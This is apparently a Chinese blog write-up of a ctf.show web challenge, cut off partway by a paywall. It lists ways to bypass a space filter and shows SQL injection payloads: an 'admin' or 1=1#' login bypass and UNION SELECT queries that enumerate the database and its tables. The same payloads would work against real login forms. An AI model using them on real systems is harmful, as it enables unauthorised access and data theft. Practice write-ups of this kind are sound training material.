题目网站https://ctf.show
1.尝试万能密码
username=admin' or 1=1#&password=1
显示sql inject error,发现有字符被过滤。
逐个字符输入后发现过滤了空格,一般空格被过滤有如下替换方法
/**/
()
回车(url编码中的%0a)
`(tap键上面的按钮)
tap
两个空格
这里选择/**/
username=admin'/**/or/**/1=1#&password=1
成功登陆
2.使用基本的sql注入模板获取flag
爆库(web2)
username=admin'/**/union/**/select/**/1,database(),3#&password=1
爆表(flag,user)
username=admin'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1
爆字段(flag)
username=admin'/**/union/**/select/**/

本文介绍了一种通过SQL注入攻击获取网站敏感信息的方法。利用万能密码登录,绕过空格过滤,逐步演示如何爆破数据库名、表名、字段名及字段值,最终获取flag。
最低0.47元/天 解锁文章
2787





